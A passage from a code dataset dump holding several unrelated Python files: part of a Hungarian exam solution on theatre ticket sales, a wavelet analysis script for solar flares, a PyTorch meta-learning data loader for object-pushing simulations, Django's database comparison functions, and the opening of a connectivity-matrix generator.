= j\n\nprint(f\"\\n4. feladat\\nA legtöbb jegyet a(z) {legtobb[0]}. árkategóriában értékesítették.\")\n\n# 5.\n\narak = {\n 1: 5000,\n 2: 4000,\n 3: 3000,\n 4: 2000,\n 5: 1500\n}\n\nbevetel = 0\n\nfor i, j in tipus.items():\n bevetel += arak[i] * j\n\nprint(f\"\\n5. feladat\\nA színház pillanatnyi bevétele {bevetel}Ft.\")\n\n# 6.\n\negyedulallo = 0\n\nfor sor in range(0, 15):\n for szek in range(0, 20):\n jelenlegi = foglaltlista[sor][szek]\n elotte = \"\"\n utana = \"\"\n try:\n if not szek - 1 == -1:\n elotte = foglaltlista[sor][szek - 1]\n else:\n elotte = \"x\"\n except IndexError:\n elotte = \"x\"\n\n try:\n utana = foglaltlista[sor][szek + 1]\n except IndexError:\n utana = \"x\"\n\n if jelenlegi == \"o\" and (elotte != \"o\" and utana != \"o\"):\n egyedulallo += 1\n\n\nprint(f\"\\n6. feladat\\nEgyedülálló üres székek száma: {egyedulallo}\")\n\n# 7.\n\nf = open(\"szabad.txt\", \"w\", encoding=\"utf-8\")\n\nfor sor in range(0, 15):\n for szek in range(0, 20):\n if foglaltlista[sor][szek] == \"x\":\n f.write(\"x\")\n else:\n f.write(f\"{kategorialista[sor][szek]}\")\n f.write(\"\\n\")\n","repo_name":"DarkWither/erettsegi_megoldasok","sub_path":"programozas/2014_oktober/nezoter.py","file_name":"nezoter.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13663342186","text":"# External imports\nimport matplotlib.pylab as plt\nimport matplotlib.ticker as ticker\nfrom matplotlib.gridspec import GridSpec\nimport numpy as np\nimport os\nimport pandas as pd\nfrom scipy.interpolate import splrep, splev\n\n# Local imports\nfrom wavelet_transform.waveletFunctions import wave_signif, wavelet\n\n# CONFIG\nDATA_PATH = \"/dcs/large/u2288122/Workspace/qpp_classification/consolidated_data\"\nS = 64\nDT = 1\nMOTHER = 'MORLET'\nPADDING = 1 # pad the time series with zeroes (recommended)\nBUFFER = 20 # Buffer-signal on the left of peak\nDJ = 28.0\nLAG1 = 0.72 # lag-1 autocorrelation for red noise background\n\ndef flare2wavelet(flare, plot=False):\n # READ THE DATA & DERIVE PARAMS\n n = len(flare)\n time = np.arange(n) * DT # construct time array\n xlim = ([0, n * DT]) # plotting range\n\n if plot:\n fig = plt.figure(figsize=(9, 12))\n gs = GridSpec(4, 4, hspace=0.4, wspace=0.75)\n plt.subplots_adjust(left=0.1, bottom=0.05, right=0.9, top=0.95,\n wspace=0, hspace=0)\n # Plot the flare\n plt1 = plt.subplot(gs[0, 0:2])\n plt1.plot(time, flare, 'k')\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Flux')\n plt.title('a) Raw flare')\n \n \n flare_peak = np.argmax(flare)\n if flare_peak < BUFFER:\n flare_start = 0\n else:\n flare_start = flare_peak - BUFFER\n n = n - flare_start\n time = np.arange(n) * DT # construct time array\n xlim = ([0, n * DT]) # plotting range\n flare = flare[flare_start:]\n trend = splev(time, \\\n splrep(time, flare, s=S))\n detrended_flare = flare - trend\n\n variance = np.std(detrended_flare, ddof=1) ** 2\n # print(\"variance = \", variance)\n\n # TRANSFORMATION\n # Wavelet transform:\n wave, period, scale, coi = wavelet(detrended_flare, DT, pad=PADDING, mother=MOTHER)\n power = (np.abs(wave)) ** 2 # compute wavelet power spectrum\n global_ws = (np.sum(power, axis=1) / n) # time-average over all times\n coi_power = np.copy(power)\n for t_step, cap in enumerate(coi):\n coi_power[np.argwhere(period > cap), t_step] = 0 \n max_power = np.max(power)\n # print(f\"Max power levels: {max_power}\")\n\n # Significance levels:\n signif = wave_signif(([variance]), dt=DT, sigtest=0, scale=scale,\n lag1=LAG1, mother=MOTHER)\n # expand signif --> (J+1)x(N) array\n sig95 = signif[:, np.newaxis].dot(np.ones(n)[np.newaxis, :])\n sig95 = power / sig95 # where ratio > 1, power is significant\n\n # Global wavelet spectrum & significance levels:\n dof = n - scale # the -scale corrects for padding at edges\n global_signif = wave_signif(variance, dt=DT, scale=scale, sigtest=1,\n lag1=LAG1, dof=dof, mother=MOTHER)\n \n \n #PLOTTING\n if plot:\n # Plot the flare along with the trend\n plt2 = plt.subplot(gs[0, 2:])\n plt2.plot(time, flare, 'k')\n plt2.plot(time, trend, 'r--')\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Flux')\n plt.title('Flare with trendline (clipped)')\n\n \n # Plot the detrended flare\n plt3 = plt.subplot(gs[1, 0:3])\n plt3.plot(time, detrended_flare, 'k')\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Flux')\n plt.title('b) Detrended flare')\n \n\n # Contour plot of wavelet power spectrum\n plt4 = plt.subplot(gs[2, 0:3])\n levels = [0, 0.5, 1, max_power / 2, max_power]\n # *** or use 'contour'\n CS = plt4.contourf(time, period, power, len(levels))\n im = plt4.contourf(CS, levels=levels,\n colors=['white', 'bisque', 'orange', 'orangered', 'darkred'])\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Frequency (seconds)')\n plt.title('c) Wavelet Power Spectrum')\n \n # 95# significance contour, levels at -99 (fake) and 1 (95# signif)\n plt4.contour(time, period, sig95, [-99, 1], colors='k')\n # cone-of-influence, anything \"above\" is dubious\n plt4.fill_between(time, coi * 0 + period[-1], coi, facecolor=\"none\",\n edgecolor=\"#00000040\", hatch='x')\n plt4.plot(time, coi, 'k')\n # format y-scale\n plt4.set_yscale('log')\n plt.ylim([np.min(period), np.max(period)])\n ax = plt.gca().yaxis\n ax.set_major_formatter(ticker.ScalarFormatter())\n plt.ticklabel_format(axis='y', style='plain')\n\n # --- Plot global wavelet spectrum\n plt4 = plt.subplot(gs[2, -1])\n plt.plot(global_ws, period)\n plt.plot(global_signif, period, '--')\n plt.xlabel('Power')\n plt.title('d) Global Wavelet Spectrum')\n plt.xlim([0, 1.25 * np.max(global_ws)])\n # format y-scale\n plt4.set_yscale('log')\n plt.ylim([np.min(period), np.max(period)])\n ax = plt.gca().yaxis\n ax.set_major_formatter(ticker.ScalarFormatter())\n plt.ticklabel_format(axis='y', style='plain')\n\n\n # Contour plot of wavelet coi_power spectrum\n plt5 = plt.subplot(gs[3, 0:3])\n levels = [0, 0.5, 1, max_power / 2, max_power]\n # *** or use 'contour'\n CS = plt.contourf(time, period, coi_power, len(levels))\n im = plt.contourf(CS, levels=levels,\n colors=['white', 'bisque', 'orange', 'orangered', 'darkred'])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Frequency (seconds)')\n plt.title('e) Wavelet Power Spectrum (COI)')\n plt.xlim(xlim[:])\n # cone-of-influence, anything \"above\" is dubious\n plt.fill_between(time, coi * 0 + period[-1], coi, facecolor=\"none\",\n edgecolor=\"#00000040\", hatch='x')\n plt.plot(time, coi, 'k')\n # format y-scale\n plt5.set_yscale('log')\n plt.ylim([np.min(period), np.max(period)])\n ax = plt.gca().yaxis\n ax.set_major_formatter(ticker.ScalarFormatter())\n plt5.ticklabel_format(axis='y', style='plain')\n plt.show()\n \n return power.T, coi_power.T\n \n\n\nif __name__ == \"__main__\":\n flares_dataset = pd.read_pickle(os.path.join(DATA_PATH, 'flares.pkl'))\n print(flares_dataset.head)\n for i in range(48, 49):\n _, coip = flare2wavelet(flares_dataset.iloc[i].X, plot=True)\n print(flares_dataset.iloc[i].y)\n print(coip.shape)\n plt.plot(coip, 'x')\n plt.show()\n\n\n# NOTES\n\"\"\"\nflare\n-> get trend(flare)\n-> detrended flare = flare - trend\n detrended\n -> wavelet_transform(detrended_flare)\n -> power, coi\n power / coi_power [num_scales x t_steps] scales: discrete frequency bands [non-integrals]\n [!] We transpose these values: power / coi_power [t_steps x num_scales]\n\"\"\"","repo_name":"coder-amey/qpp_classification","sub_path":"preprocessing/flare2wavelet.py","file_name":"flare2wavelet.py","file_ext":"py","file_size_in_byte":6747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18583691031","text":"import torch\nimport numpy as np\nimport math\nfrom torch.utils.data import Dataset\nimport json\nimport os\nfrom tqdm import tqdm\nimport time\n\n\ndef make_maml_batch(domains, read_domain, n_trj, len_trj, t_steps, K):\n x_support = []\n a_support = []\n y_support = []\n x_query = []\n a_query = []\n y_query = []\n\n for domain in domains:\n x, x1, a = read_domain(domain)\n\n support_idxs = np.random.choice(x.shape[0], K, replace=False)\n query_idxs = list(range(x.shape[0]))\n for support_idx in support_idxs:\n query_idxs.remove(support_idx)\n\n x_s = np.reshape(x[support_idxs], (K * (len_trj - t_steps + 1), -1))\n x1_s = np.reshape(x1[support_idxs], (K * (len_trj - t_steps + 1), -1))\n a_s = np.reshape(a[support_idxs], (K * (len_trj - t_steps + 1), -1))\n x_q = np.reshape(x[query_idxs], ((n_trj - K) * (len_trj - t_steps + 1), -1))\n x1_q = np.reshape(x1[query_idxs], ((n_trj - K) * (len_trj - t_steps + 1), -1))\n a_q = np.reshape(a[query_idxs], ((n_trj - K) * (len_trj - t_steps + 1), -1))\n\n idx = list(range(x_s.shape[0]))\n np.random.shuffle(idx)\n\n x_support.append(np.expand_dims(x_s[idx], 0))\n y_support.append(np.expand_dims(x1_s[idx], 0))\n a_support.append(np.expand_dims(a_s[idx], 0))\n\n idx = list(range(x_q.shape[0]))\n np.random.shuffle(idx)\n\n x_query.append(np.expand_dims(x_q[idx], 0))\n y_query.append(np.expand_dims(x1_q[idx], 0))\n a_query.append(np.expand_dims(a_q[idx], 0))\n\n x_support = torch.from_numpy(np.concatenate(x_support, 0)).float()\n a_support = torch.from_numpy(np.concatenate(a_support, 0)).float()\n y_support = torch.from_numpy(np.concatenate(y_support, 0)).float()\n x_query = torch.from_numpy(np.concatenate(x_query, 0)).float()\n a_query = torch.from_numpy(np.concatenate(a_query, 0)).float()\n y_query = torch.from_numpy(np.concatenate(y_query, 0)).float()\n\n return x_support, a_support, y_support, x_query, a_query, y_query\n\n\ndef make_non_maml_batch(domains, read_domain, n_trj, len_trj, t_steps):\n x_data = []\n a_data = []\n y_data = []\n\n for domain in domains:\n x, x1, a = read_domain(domain)\n\n x_s = np.reshape(x, (n_trj * (len_trj - t_steps + 1), -1))\n x1_s = np.reshape(x1, (n_trj * (len_trj - t_steps + 1), -1))\n a_s = np.reshape(a, (n_trj * (len_trj - t_steps + 1), -1))\n\n idx = list(range(x_s.shape[0]))\n np.random.shuffle(idx)\n\n x_data.append(np.expand_dims(x_s[idx], 0))\n y_data.append(np.expand_dims(x1_s[idx], 0))\n a_data.append(np.expand_dims(a_s[idx], 0))\n\n # todo: load numpy not torch?\n x_data = torch.from_numpy(np.concatenate(x_data, 0)).float()\n a_data = torch.from_numpy(np.concatenate(a_data, 0)).float()\n y_data = torch.from_numpy(np.concatenate(y_data, 0)).float()\n\n return x_data, a_data, y_data\n\n\ndef euler_yaw_z_from_quaternion(quat):\n x = quat[0]\n y = quat[1]\n z = quat[2]\n w = quat[3]\n t3 = +2.0 * (w * z + x * y)\n t4 = +1.0 - 2.0 * (y * y + z * z)\n yaw_z = math.atan2(t3, t4)\n return yaw_z\n\nclass PushingDataset(Dataset):\n\n def __init__(self, params):\n\n self.subset = params['subset']\n self.val_ratio = params['test_split']\n\n self.dlo_only = params['dlo_only']\n self.obj_only = params['obj_only']\n self.obj_input = params['obj_input']\n\n self.maml = params['maml']\n self.t_steps = params['t_steps']\n\n self.max_len_dlo = 32\n self.max_n_obj = 3\n self.n_trj = 500\n self.len_trj = 20 # 21 steps, 20 to predict\n\n # self.data_dir = '/Midgard/Data/areichlin/Robert_meta_learn/meta_learn3_clean'\n # self.data_dir = './meta_learn2_clean'\n self.data_dir = './meta_learn'\n\n self.subset_values = []\n self.subset_training_data = []\n self.subset_test_data = []\n\n self.data = {}\n\n for dir in os.listdir(self.data_dir):\n with open(self.data_dir+'/'+dir+'/params.json', 'r') as f:\n datapoint = json.load(f)\n self.data[str(datapoint[\"domain_id\"])] = datapoint\n\n self.training_data = []\n self.test_data = []\n\n self.ordered_data = {}\n\n for m_type in ['soft', 'flexible', 'elastoplastic']:\n self.ordered_data[m_type] = {}\n for att in ['none', 'movable', 'fixed']:\n self.ordered_data[m_type][att] = {}\n for l in [0.1, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16]:\n self.ordered_data[m_type][att][l] = {}\n for n_obj in [0, 1, 2, 3]:\n self.ordered_data[m_type][att][l][n_obj] = []\n\n\n\n for key, value in self.data.items():\n self.ordered_data[value['dlo']['material_type']][value['dlo']['attachment']][value['dlo']['length']][len(value['rigid_objects'])].append(key)\n\n\n\n\n\n\n # import matplotlib.pyplot as plt\n # sub_set = []\n # for m_type in ['flexible']:\n # for att in ['none']:\n # for l in [0.1]:\n # for n_obj in [3]:\n # sub_set.extend(self.ordered_data[m_type][att][l][n_obj])\n # count = 0\n # for dom in sub_set:\n # x, x1, a = self.read_domain(dom)\n # for trj in range(2):\n # fig = plt.figure()\n # for t in range(19):\n # for dlo in range(20):\n # plt.plot(x1[trj, t, dlo, 0], x1[trj, t, dlo, 1], 'ro', alpha=(t*1/20.))\n # plt.show()\n # count += 1\n # if count == 20:\n # break\n # print()\n\n\n\n\n\n\n for m_type in ['soft', 'flexible', 'elastoplastic']:\n for att in ['none', 'movable', 'fixed']:\n for l in [0.1, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16]:\n for n_obj in [0, 1, 2, 3]:\n train_split = int(len(self.ordered_data[m_type][att][l][n_obj])*(1. - self.val_ratio))\n self.training_data.extend(self.ordered_data[m_type][att][l][n_obj][:train_split])\n self.test_data.extend(self.ordered_data[m_type][att][l][n_obj][train_split:])\n\n if self.subset == 1:\n self.load_subset()\n\n def load_subset(self):\n for m_type in ['soft', 'flexible', 'elastoplastic']:\n for att in ['none', 'movable', 'fixed']:\n for l in [0.16]:\n for n_obj in [0]:\n train_split = int(len(self.ordered_data[m_type][att][l][n_obj]) * (1. - self.val_ratio))\n self.subset_training_data.extend(self.ordered_data[m_type][att][l][n_obj][:train_split])\n self.subset_test_data.extend(self.ordered_data[m_type][att][l][n_obj][train_split:])\n\n for indeces in [self.subset_training_data, self.subset_test_data]:\n x_data = []\n a_data = []\n y_data = []\n for domain in indeces:\n x, x1, a = self.read_domain(domain)\n x_data.append(torch.from_numpy(x).float())\n a_data.append(torch.from_numpy(a).float())\n y_data.append(torch.from_numpy(x1).float())\n self.subset_values.append({'x': x_data, 'a': a_data, 'y': y_data})\n\n def get_subset_batch(self, mode, N, K):\n\n if mode == 'train':\n mode_idx = 0\n else:\n mode_idx = 1\n\n if mode_idx == 0:\n task_sims = np.random.choice(range(len(self.subset_values[mode_idx]['x'])), N, replace=False)\n else:\n task_sims = range(len(self.subset_values[mode_idx]['x']))\n\n if self.maml == 0:\n x_s, a_s, y_s = [], [], []\n for task in task_sims:\n\n idx = list(range(self.n_trj * (self.len_trj - self.t_steps + 1)))\n np.random.shuffle(idx)\n\n x_s.append(torch.reshape(self.subset_values[mode_idx]['x'][task], (1, self.n_trj * (self.len_trj - self.t_steps + 1), -1))[:, idx])\n a_s.append(torch.reshape(self.subset_values[mode_idx]['a'][task], (1, self.n_trj * (self.len_trj - self.t_steps + 1), -1))[:, idx])\n y_s.append(torch.reshape(self.subset_values[mode_idx]['y'][task], (1, self.n_trj * (self.len_trj - self.t_steps + 1), -1))[:, idx])\n\n x_s = torch.cat(x_s, 0)\n a_s = torch.cat(a_s, 0)\n y_s = torch.cat(y_s, 0)\n\n return x_s, a_s, y_s, None, None, None\n\n else:\n x_s, a_s, y_s, x_q, a_q, y_q = [], [], [], [], [], []\n for task in task_sims:\n\n idx = list(range(self.subset_values[mode_idx]['x'][task].shape[0]))\n np.random.shuffle(idx)\n\n # idx_s = list(range((K) * (self.len_trj - self.t_steps + 1)))\n # np.random.shuffle(idx)\n #\n # idx_q = list(range((self.n_trj - K) * (self.len_trj - self.t_steps + 1)))\n # np.random.shuffle(idx)\n\n x_s.append(torch.reshape(self.subset_values[mode_idx]['x'][task][idx[:K]], (1, (K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_s])\n a_s.append(torch.reshape(self.subset_values[mode_idx]['a'][task][idx[:K]], (1, (K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_s])\n y_s.append(torch.reshape(self.subset_values[mode_idx]['y'][task][idx[:K]], (1, (K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_s])\n x_q.append(torch.reshape(self.subset_values[mode_idx]['x'][task][idx[K:]], (1, (self.n_trj - K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_q])\n a_q.append(torch.reshape(self.subset_values[mode_idx]['a'][task][idx[K:]], (1, (self.n_trj - K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_q])\n y_q.append(torch.reshape(self.subset_values[mode_idx]['y'][task][idx[K:]], (1, (self.n_trj - K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_q])\n\n x_s = torch.cat(x_s, 0)\n a_s = torch.cat(a_s, 0)\n y_s = torch.cat(y_s, 0)\n x_q = torch.cat(x_q, 0)\n a_q = torch.cat(a_q, 0)\n y_q = torch.cat(y_q, 0)\n\n return x_s, a_s, y_s, x_q, a_q, y_q\n\n def get_batch(self, mode, N, K):\n\n if self.subset == 1:\n return self.get_subset_batch(mode, N, K)\n\n if mode == 'train':\n sims = self.training_data\n else:\n sims = self.test_data\n\n task_sims = np.random.choice(sims, N)\n\n if self.maml == 0:\n\n x_data, a_data, y_data = make_non_maml_batch(task_sims, self.read_domain, self.n_trj, self.len_trj, self.t_steps)\n\n return x_data, a_data, y_data, None, None, None\n\n x_support, a_support, y_support, x_query, a_query, y_query = make_maml_batch(task_sims, self.read_domain, self.n_trj, self.len_trj, self.t_steps, K)\n\n return x_support, a_support, y_support, x_query, a_query, y_query\n\n def get_domain(self, K):\n\n sims = self.test_data\n if self.subset:\n sims = self.subset_test_data\n\n task_sims = np.random.choice(sims, 1)\n\n if self.maml == 0:\n\n x_data, a_data, y_data = make_non_maml_batch(task_sims, self.read_domain, self.n_trj, self.len_trj, self.t_steps)\n\n return x_data, a_data, y_data, None, None, None\n\n x_support, a_support, y_support, x_query, a_query, y_query = make_maml_batch(task_sims, self.read_domain, self.n_trj, self.len_trj, self.t_steps, K)\n\n return x_support, a_support, y_support, x_query, a_query, y_query\n\n def read_domain(self, folder):\n\n if self.subset:\n last_dim = 2\n else:\n last_dim = 3\n\n data_info = self.data[folder]\n\n folder = '0'*(5-len(folder)) + folder\n data_dir = self.data_dir + '/' + folder\n\n # Load state space data\n f_pos_data = \"%s/data_pos_all.npy\" % data_dir\n f_or_data = \"%s/data_or_all.npy\" % data_dir\n f_action_data = \"%s/data_true_action_all.npy\" % data_dir\n\n # Load position data\n pos_data = np.load(f_pos_data)\n\n # Load orientation data\n or_data = np.load(f_or_data)\n\n # Load action data\n actions_data = np.load(f_action_data)\n\n n_traj = pos_data.shape[0]\n n_states_per_traj = pos_data.shape[1]\n # self.n_interactions = self.n_traj * (self.n_states_per_traj - 1)\n n_dlo_segments = int(data_info[\"dlo\"][\"length\"] * 200) # a new segment every 5mm\n n_rigid_objects = len(data_info[\"rigid_objects\"]) # number of rigid object can be taken form params file\n\n # Get position of pusher\n pusher_pos_all = np.ones((n_traj, n_states_per_traj, 1, last_dim))\n pusher_pos_all[:, :, 0, :2] = pos_data[:, :, 0] # first element in pos is pusher\n\n # Get position of segments\n seg_pos_all = np.zeros((n_traj, n_states_per_traj, self.max_len_dlo, last_dim))\n seg_pos_all[:, :, :n_dlo_segments, :2] = pos_data[:, :, 1:1+n_dlo_segments] # following ones are segment positions\n if not self.subset:\n seg_pos_all[:, :, :n_dlo_segments, 2] = 1\n\n # Get data for rigid objects\n # rigid_object_or_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n # rigid_object_pos_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n if n_rigid_objects > 0:\n rigid_object_or_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n rigid_object_pos_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n # Saved orientations are represented using quaternions.\n # We compute the euler angle around the z-axis to get a more compact representation.\n # An even better encoding is probably to split into sine and cosine of the angle (what I did here...)\n # rigid_object_or_all = np.zeros(shape=(or_data.shape[0], or_data.shape[1], n_rigid_objects, 2))\n for i in range(or_data.shape[0]):\n for j in range(or_data[i].shape[0]):\n for k in range(n_rigid_objects):\n orientation = euler_yaw_z_from_quaternion(or_data[i, j, -n_rigid_objects + k])\n or_data[i, j, k, 0] = np.sin(orientation)\n or_data[i, j, k, 1] = np.cos(orientation)\n\n rigid_object_or_all[:, :, :n_rigid_objects, :2] = or_data[:, :, :, :2]\n if not self.subset:\n rigid_object_or_all[:, :, :n_rigid_objects, 2] = 1\n\n # For the rigid objects we are interested in the positions of the bodies (might contain multiple geometries)\n # Body positions are in the second part of the pos array\n rigid_object_pos_all[:, :, :n_rigid_objects, :2] = pos_data[:, :, -n_rigid_objects:]\n if not self.subset:\n rigid_object_pos_all[:, :, :n_rigid_objects, 2] = 1\n\n if self.dlo_only != 1:\n states = np.concatenate([pusher_pos_all, seg_pos_all, rigid_object_pos_all, rigid_object_or_all], -2)\n else:\n states = np.concatenate([pusher_pos_all, seg_pos_all], -2)\n\n actions = np.zeros((n_traj, n_states_per_traj-self.t_steps, 2*self.t_steps))\n for t in range(n_states_per_traj-self.t_steps):\n actions[:, t] = np.reshape(actions_data[:, t:t+self.t_steps], (self.n_trj, -1))\n\n current_states = states[:, :(n_states_per_traj-self.t_steps)]\n next_states = states[:, self.t_steps:, :, :2]\n if self.dlo_only == 1:\n next_states = states[:, self.t_steps:, 1:(1+n_dlo_segments), :2]\n\n if self.obj_only == 1:\n next_states = states[:, self.t_steps:, (1 + n_dlo_segments):-3, :2]\n\n return current_states, next_states, actions\n\n","repo_name":"albiLo17/Meta-Dynamics","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":15874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6300411375","text":"\"\"\"Database functions that do comparisons or type conversions.\"\"\"\nfrom django.db import NotSupportedError\nfrom django.db.models.expressions import Func, Value\nfrom django.db.models.fields import TextField\nfrom django.db.models.fields.json import JSONField\nfrom django.utils.regex_helper import _lazy_re_compile\n\n\nclass Cast(Func):\n \"\"\"Coerce an expression to a new field type.\"\"\"\n\n function = \"CAST\"\n template = \"%(function)s(%(expressions)s AS %(db_type)s)\"\n\n def __init__(self, expression, output_field):\n super().__init__(expression, output_field=output_field)\n\n def as_sql(self, compiler, connection, **extra_context):\n extra_context[\"db_type\"] = self.output_field.cast_db_type(connection)\n return super().as_sql(compiler, connection, **extra_context)\n\n def as_sqlite(self, compiler, connection, **extra_context):\n db_type = self.output_field.db_type(connection)\n if db_type in {\"datetime\", \"time\"}:\n # Use strftime as datetime/time don't keep fractional seconds.\n template = \"strftime(%%s, %(expressions)s)\"\n sql, params = super().as_sql(\n compiler, connection, template=template, **extra_context\n )\n format_string = \"%H:%M:%f\" if db_type == \"time\" else \"%Y-%m-%d %H:%M:%f\"\n params.insert(0, format_string)\n return sql, params\n elif db_type == \"date\":\n template = \"date(%(expressions)s)\"\n return super().as_sql(\n compiler, connection, template=template, **extra_context\n )\n return self.as_sql(compiler, connection, **extra_context)\n\n def as_mysql(self, compiler, connection, **extra_context):\n template = None\n output_type = self.output_field.get_internal_type()\n # MySQL doesn't support explicit cast to float.\n if output_type == \"FloatField\":\n template = \"(%(expressions)s + 0.0)\"\n # MariaDB doesn't support explicit cast to JSON.\n elif output_type == \"JSONField\" and connection.mysql_is_mariadb:\n template = \"JSON_EXTRACT(%(expressions)s, '$')\"\n return self.as_sql(compiler, connection, template=template, **extra_context)\n\n def as_postgresql(self, compiler, connection, **extra_context):\n # CAST would be valid too, but the :: shortcut syntax is more readable.\n # 'expressions' is wrapped in parentheses in case it's a complex\n # expression.\n return self.as_sql(\n compiler,\n connection,\n template=\"(%(expressions)s)::%(db_type)s\",\n **extra_context,\n )\n\n def as_oracle(self, compiler, connection, **extra_context):\n if self.output_field.get_internal_type() == \"JSONField\":\n # Oracle doesn't support explicit cast to JSON.\n template = \"JSON_QUERY(%(expressions)s, '$')\"\n return super().as_sql(\n compiler, connection, template=template, **extra_context\n )\n return self.as_sql(compiler, connection, **extra_context)\n\n\nclass Coalesce(Func):\n \"\"\"Return, from left to right, the first non-null expression.\"\"\"\n\n function = \"COALESCE\"\n\n def __init__(self, *expressions, **extra):\n if len(expressions) < 2:\n raise ValueError(\"Coalesce must take at least two expressions\")\n super().__init__(*expressions, **extra)\n\n @property\n def empty_result_set_value(self):\n for expression in self.get_source_expressions():\n result = expression.empty_result_set_value\n if result is NotImplemented or result is not None:\n return result\n return None\n\n def as_oracle(self, compiler, connection, **extra_context):\n # Oracle prohibits mixing TextField (NCLOB) and CharField (NVARCHAR2),\n # so convert all fields to NCLOB when that type is expected.\n if self.output_field.get_internal_type() == \"TextField\":\n clone = self.copy()\n clone.set_source_expressions(\n [\n Func(expression, function=\"TO_NCLOB\")\n for expression in self.get_source_expressions()\n ]\n )\n return super(Coalesce, clone).as_sql(compiler, connection, **extra_context)\n return self.as_sql(compiler, connection, **extra_context)\n\n\nclass Collate(Func):\n function = \"COLLATE\"\n template = \"%(expressions)s %(function)s %(collation)s\"\n allowed_default = False\n # Inspired from\n # https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERS\n collation_re = _lazy_re_compile(r\"^[\\w-]+$\")\n\n def __init__(self, expression, collation):\n if not (collation and self.collation_re.match(collation)):\n raise ValueError(\"Invalid collation name: %r.\" % collation)\n self.collation = collation\n super().__init__(expression)\n\n def as_sql(self, compiler, connection, **extra_context):\n extra_context.setdefault(\"collation\", connection.ops.quote_name(self.collation))\n return super().as_sql(compiler, connection, **extra_context)\n\n\nclass Greatest(Func):\n \"\"\"\n Return the maximum expression.\n\n If any expression is null the return value is database-specific:\n On PostgreSQL, the maximum not-null expression is returned.\n On MySQL, Oracle, and SQLite, if any expression is null, null is returned.\n \"\"\"\n\n function = \"GREATEST\"\n\n def __init__(self, *expressions, **extra):\n if len(expressions) < 2:\n raise ValueError(\"Greatest must take at least two expressions\")\n super().__init__(*expressions, **extra)\n\n def as_sqlite(self, compiler, connection, **extra_context):\n \"\"\"Use the MAX function on SQLite.\"\"\"\n return super().as_sqlite(compiler, connection, function=\"MAX\", **extra_context)\n\n\nclass JSONObject(Func):\n function = \"JSON_OBJECT\"\n output_field = JSONField()\n\n def __init__(self, **fields):\n expressions = []\n for key, value in fields.items():\n expressions.extend((Value(key), value))\n super().__init__(*expressions)\n\n def as_sql(self, compiler, connection, **extra_context):\n if not connection.features.has_json_object_function:\n raise NotSupportedError(\n \"JSONObject() is not supported on this database backend.\"\n )\n return super().as_sql(compiler, connection, **extra_context)\n\n def as_postgresql(self, compiler, connection, **extra_context):\n copy = self.copy()\n copy.set_source_expressions(\n [\n Cast(expression, TextField()) if index % 2 == 0 else expression\n for index, expression in enumerate(copy.get_source_expressions())\n ]\n )\n return super(JSONObject, copy).as_sql(\n compiler,\n connection,\n function=\"JSONB_BUILD_OBJECT\",\n **extra_context,\n )\n\n def as_oracle(self, compiler, connection, **extra_context):\n class ArgJoiner:\n def join(self, args):\n args = [\" VALUE \".join(arg) for arg in zip(args[::2], args[1::2])]\n return \", \".join(args)\n\n return self.as_sql(\n compiler,\n connection,\n arg_joiner=ArgJoiner(),\n template=\"%(function)s(%(expressions)s RETURNING CLOB)\",\n **extra_context,\n )\n\n\nclass Least(Func):\n \"\"\"\n Return the minimum expression.\n\n If any expression is null the return value is database-specific:\n On PostgreSQL, return the minimum not-null expression.\n On MySQL, Oracle, and SQLite, if any expression is null, return null.\n \"\"\"\n\n function = \"LEAST\"\n\n def __init__(self, *expressions, **extra):\n if len(expressions) < 2:\n raise ValueError(\"Least must take at least two expressions\")\n super().__init__(*expressions, **extra)\n\n def as_sqlite(self, compiler, connection, **extra_context):\n \"\"\"Use the MIN function on SQLite.\"\"\"\n return super().as_sqlite(compiler, connection, function=\"MIN\", **extra_context)\n\n\nclass NullIf(Func):\n function = \"NULLIF\"\n arity = 2\n\n def as_oracle(self, compiler, connection, **extra_context):\n expression1 = self.get_source_expressions()[0]\n if isinstance(expression1, Value) and expression1.value is None:\n raise ValueError(\"Oracle does not allow Value(None) for expression1.\")\n return super().as_sql(compiler, connection, **extra_context)\n","repo_name":"django/django","sub_path":"django/db/models/functions/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"25749818686","text":"import torch\nfrom spikeometric.datasets.connectivity_generator import ConnectivityGenerator\n\nclass UniformGenerator(ConnectivityGenerator):\n \"\"\"\n A dataset of connectivity matrices for networks of neurons, where each matrix is generated from a\n uniform distribution over the range [low, high] and then sparsified to the specified sparsity.\n \"\"\"\n def __init__(self, n_neurons: int, low: float, high: float, sparsity: float, rng=None) -> None:\n \"\"\"Generates a dataset of uniformly distributed connectivity matrices, and saves them to the raw directory if \n they do not already exist. If the raw directory already exists, the dataset is loaded from the raw directory and\n \"\"\"\n self.n_neurons = n_neurons\n self.low = low\n self.high = high\n self.sparsity = sparsity\n self.rng = rng if rng is not None else torch.Generator()\n\n def generate_W0(self):\n \"\"\"Generates a single connectivity matrix W0 from a uniform distribution over the range [low, high] and then sparsifies it to the 